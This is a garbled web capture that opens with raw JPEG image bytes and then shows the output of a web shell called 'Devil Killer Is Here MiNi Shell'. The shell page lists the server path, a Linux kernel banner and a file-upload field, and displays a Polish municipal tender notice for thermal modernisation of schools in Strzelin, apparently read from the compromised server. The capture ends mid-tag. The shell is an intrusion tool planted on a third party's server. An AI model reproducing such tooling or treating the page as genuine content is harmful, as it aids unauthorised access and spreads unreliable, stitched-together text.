JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220516/0015984701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kompleksowa termomodernizacja budynków szkolnych w Strzelinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Strzelin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934957</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ząbkowicka 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@strzelin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gmstrzelin.finn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa termomodernizacja budynków szkolnych w Strzelinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0f13e8a3-d4fd-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00159847</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027936/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.17 Kompleksowa termomodernizacja budynków szkolnych w Strzelinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Dolnośląskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminastrzelin.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminastrzelin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. Przez<br/>środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>(tekst jednolity Dz. U. z 2020 r. poz. 344 ze zm.). 2. W postępowaniu o udzielenie zamówienia ofertę,<br/>oświadczenia, o<br/>którym mowa wart. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>bądź kwalifikowalnym podpisem elektronicznym. 3. W przedmiotowym postępowaniu Zamawiający<br/>dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków,<br/>zawiadomień oraz informacji:elektronicznie na adres e-mail: zamowieniapubliczne@strzelin.pl lub za<br/>pośrednictwem Platformy znajdującej się pod adresem: https://gminastrzelin.ezamawiajacy.pl w<br/>zakładce„Korespondencja”. 4.Ogólne zasady korzystania z Platformy,a) zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemu na subdomenie:<br/>https://gminastrzelin.ezamawiajacy.pl,lubhttps://oneplace.marketplanet.pl. b) Wykonawca po wybraniu<br/>opcji „Przystąp do postępowania”zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło,wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”. c) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia Oferty w postaci elektronicznej.Wykonawca wraz z potwierdzeniem złożenia wniosku<br/>rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.d) Po założeniu konta<br/>Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu<br/>środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania<br/>zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.5.Zamawiający określa dopuszczalny format podpisu elektronicznego, jako: 5.1.<br/>dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES, 5.2. dopuszcza się podpisanie<br/>dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny<br/>plik z podpisem.6.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif,<br/>tiff, geotiff, png,svg,wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml,xsd,gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: pdf. 7. Pozostałe informacje zawarte są w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z04.05.2016, str. 1), dalej RODO, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Urząd Miasta i Gminy w Strzelinie, ul. Ząbkowicka11, 57-100Strzelin;- Kontakt z administratorem bezpieczeństwa informacji w Urzędzie Miasta i Gminy w Strzelinie, ul.<br/>Ząbkowicka 11, 57-100 Strzelin: e-mail: umig@strzelin.pl lub pisemnie<br/>na adres siedziby administratora danych osobowych;- Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na<br/>administratorze,związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;-<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (t.j. Dz. U. z 2021 r. poz. 1129 ze zm.), dalej ustawa Pzp; - Pani/Pana dane osobowe będą<br/>przechowywane,zgodnie z art.78 ust. 1ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;a po tym czasie przez okres wymagany<br/>przepisami szczególnymi prawa, w szczególności ze względu na cele archiwalne- zgodnie z JRWA:<br/>dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5<br/>lat)natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres<br/>przechowywania10 lat);- obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;-<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:−na podstawie art.15RODO prawo<br/>dostępu do danych osobowych Pani/Pana dotyczących;−na podstawie art. 16RODO prawo do<br/>sprostowania Pani/Pana danych osobowych ;−na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO ; −prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;- nie przysługuje Pani/Panu:−w związku z art. 17 ust. 3lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;−prawo do przenoszenia danych osobowych,o którym<br/>mowa wart. 20RODO;−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.1 lit. c<br/>RODO. -przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani/Panu danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: „Termomodernizacja budynku PSP nr 4 w Strzelinie wraz z montażem zewnętrznej windy dla osób<br/>niepełnosprawnych”<br/>1. Zakres przedmiotu zamówienia obejmuje termomodernizację budynku PSP nr 4 w Strzelinie, tj. budynku głównego - A,<br/>budynku łącznika - B oraz budynku sali gimnastycznej – C m.in. poprzez:<br/>a) demontaż parapetów zewnętrznych oraz obróbek blacharskich,<br/>b) demontaż reklam, anten oraz wszystkich elementów uniemożliwiających prace budowlane;<br/>c) oczyszczenie i przemalowanie krat, barierek stalowych i zadaszeń;<br/>d) usunięcie starych warstw farb i mas szpachlowych z tynków;<br/>e) wykonanie docieplenia ścian zewnętrznych styropianem gr. 6 cm metodą lekką-mokrą;<br/>f) wykonanie ocieplenia ościeży okiennych styropianem gr. 2 cm;<br/>g) wykonanie nowej elewacji budynku tynkiem cienkowarstwowym silikatowym barwionym w masie o fakturze baranek;<br/>h) montaż nowych obróbek blacharskich i parapetów zewnętrznych z blachy płaskiej stalowej powlekanej;<br/>i) montaż nowych rur spustowych;<br/>j) wykonanie nowej opaski wokół budynku z kostki betonowej;<br/>k) remont przyłączy kanalizacji deszczowej z rur kielichowych PVC klasy S szereg S 16,7 (SDR 34) średnicy Dy=200 mm, z<br/>kielichami uszczelnionymi przy pomocy uszczelek gumowych;<br/>l) remont schodów zewnętrznych do łącznika wraz z wykonaniem nowych okładzin schodowych;<br/>m) montaż na schodach głównych okładzin antypoślizgowych;<br/>n) montaż na zadaszeniu schodów głównych płyt poliwęglanowych kolorowych;<br/>o) montaż nowych lamp oświetleniowych nad wejściami do budynku;<br/>p) docieplenie stropodachów;<br/>q) remont pokrycia dachów;<br/>r) wymianę stolarki okiennej. Nowe okna z PVC czterokomorowego w kolorze białym, skrzydła rozwieralne i uchylne z<br/>wbudowanym nawiewnikiem z regulacją ciśnieniową z przekładką termiczną. Współczynnik przenikania ciepła Umax =<br/>0,9W/m2K. Okna do sali gimnastycznej z aluminium profil ciepły szkło bezpieczne.<br/>s) wymianę stolarki drzwiowej zewnętrznej;<br/>t) wymiana uszkodzonych elementów instalacji odgromowej;<br/>u) odtworzenie dylatacji systemowych pomiędzy poszczególnymi segmentami budynków, wykonanie dylatacji warstwy<br/>termoizolacyjnej;<br/>v) remont murków betonowych wraz z czapami z lastryka przed wejściem głównym do budynku.<br/>2. Przedmiotem zamówienia jest również rozbudowa budynku PSP nr 4 w Strzelinie o windę zewnętrzną dostosowaną dla<br/>osób niepełnosprawnych m.in. poprzez:<br/>a) budowę windy zewnętrznej osobowej z napędem elektrycznym przylegającej do północnej elewacji budynku, dostępnej z<br/>zewnątrz dla osób niepełnosprawnych obsługującej 4 kondygnacje;<br/>b) rozbiórkę płyt betonowych, kostki kamiennej w miejscu projektowanej windy;<br/>c) wykonanie nowych podejść do windy o nawierzchni z kostki betonowej wibroprasowanej gr. 8 cm;<br/>d) wykonanie fundamentu w postaci płyty fundamentowej oraz ścian fundamentowych żelbetowych o grubości 25 cm;<br/>e) demontaż ścian w miejscu projektowanych drzwi windy;<br/>f) wykonanie nowych ścianek działowych;<br/>g) demontaż istniejącej stolarki okiennej, parapetów wewnętrznych i zewnętrznych, grzejników w miejscu projektowanej<br/>windy;<br/>h) zabezpieczenie rurą ochronną przewodu kanalizacji sanitarnej;<br/>i) wykonanie odwodnienia zadaszenia windy poprzez rynnę Ø75 i rurę spustową Ø63 na zadaszeniu szybu, odprowadzenie<br/>wody do kanalizacji deszczowej;<br/>j) montaż nowych grzejników;<br/>k) montaż nowych drzwi wewnętrznych;<br/>l) wycinka drzewa wraz z żywopłotem – kolidujących z projektowanymi utwardzeniami;<br/>przełożenie rury spustowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42416100-6 - Windy</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej, zamawiający będzie się kierował<br/>następującymi kryteriami: a) Cena oferty (C) - 60 punktów, b) Okres gwarancji i rękojmi (G) - 40<br/>punktów. Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości = wartość<br/>punktowa „C” (cena oferty) + wartość punktowa „G” (okres gwarancji i rękojmi).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: „Termomodernizacja budynków PSP nr 5 w Strzelinie”<br/>1. Zakres przedmiotu zamówienia obejmuje termomodernizację budynków wchodzących w skład Publicznej Szkoły<br/>Podstawowej nr 5 w Strzelinie, tj.<br/>a) szatni przy sali gimnastycznej - nr 1;<br/>b) sali gimnastycznej – nr 2;<br/>c) zaplecza sali gimnastycznej – nr 3;<br/>d) budynku głównego – nr 4;<br/>e) łącznika – nr 5;<br/>f) części nowej – nr 6, 7, 8,<br/>g) kotłowni – nr 9<br/>h) pomieszczenia gospodarczego – nr 10<br/>i) stacji trafo – nr 11<br/>m.in. poprzez:<br/>a) demontaż parapetów zewnętrznych oraz obróbek blacharskich;<br/>b) demontaż reklam, anten oraz wszystkich elementów uniemożliwiających prace budowlane;<br/>c) usunięcie starych warstw farb i mas szpachlowych z tynków;<br/>d) usunięcie ocieplenia cokołów, ścian oraz ościeży ze styropianu;<br/>e) wykonanie docieplenia ścian zewnętrznych styropianem gr. 6 cm metodą lekką-mokrą;<br/>f) wykonanie ocieplenia ościeży okiennych styropianem gr. 2 cm;<br/>g) wykonanie nowej elewacji budynku tynkiem cienkowarstwowym silikatowym barwionym w masie o fakturze baranek;<br/>h) wzmocnienie siatką podłoża w miejscach istniejących pęknięć na elewacji;<br/>i) montaż nowych obróbek blacharskich i parapetów zewnętrznych z blachy stalowej ocynkowanej;<br/>j) montaż nowych rur spustowych;<br/>k) ocieplenie stropodachu granulatem z wełny mineralnej (budynki nr 4, 5, 6, 7, 8);<br/>l) ocieplenie styropapą (budynki nr 1, 2, 3, 9, 10, 11);<br/>m) remont przyłączy kanalizacji deszczowej;<br/>n) montaż nowych lamp oświetleniowych zewnętrznych;<br/>o) wymianę instalacji odgromowej;<br/>p) wykonanie instalacji odgromowej – pionowe zwody;<br/>q) częściową wymianę stolarki okiennej. Nowe okna z PVC czterokomorowego w kolorze białym, skrzydła rozwieralne i<br/>uchylne z wbudowanym nawiewnikiem z regulacją ciśnieniową z przekładką termiczną. Współczynnik przenikania ciepła<br/>Umax = 0,9W/m2K. Okna do Sali gimnastycznej z aluminium profil ciepły szkło bezpieczne;<br/>r) częściową wymianę stolarki drzwiowej – profil aluminiowy ciepły – szkło bezpieczne, kompletne z samozamykaczami oraz<br/>dwoma kompletami zamków;<br/>s) odtworzenie dylatacji systemowych pomiędzy poszczególnymi segmentami budynków, wykonanie dylatacji warstwy<br/>termoizolacyjnej;<br/>t) wykonanie izolacji wodochronnej ścian fundamentowych w budynkach;<br/>u) wykonanie docieplenia ścian fundamentowych;<br/>v) oczyszczenie i przemalowanie krat, barierek i zadaszeń;<br/>w) demontaż istniejącej opaski z kostki betonowej, grysu granitowego oraz betonu i jej ponowne wykonanie;<br/>x) remont kominów i murków ogniowych;<br/>y) remont pokrycia dachów;<br/>z) montaż dzwonka przyzywowego przy drzwiach głównych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 